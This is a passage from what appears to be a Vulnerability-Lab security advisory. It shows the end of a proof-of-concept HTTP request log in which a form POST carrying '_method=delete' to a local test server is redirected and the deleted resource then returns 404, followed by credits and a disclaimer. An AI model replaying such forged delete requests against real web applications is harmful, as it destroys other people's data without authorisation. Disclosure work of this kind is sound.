content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 28
Connection: keep-alive
_method=delete=Delete
-
POST: HTTP/1.1 302 Found
Location: /
Content-Type: text/html; charset=utf-8
Content-Length: 67
-
http://localhost:8181/
Host: localhost:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8181/
Connection: keep-alive
- (Game Over)
GET: HTTP/1.1 404 Not Found (Unavailable)
Accept-Ranges: bytes
Content-Length: 0


Credits & Authors:
==
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com   www.vuln-lab.com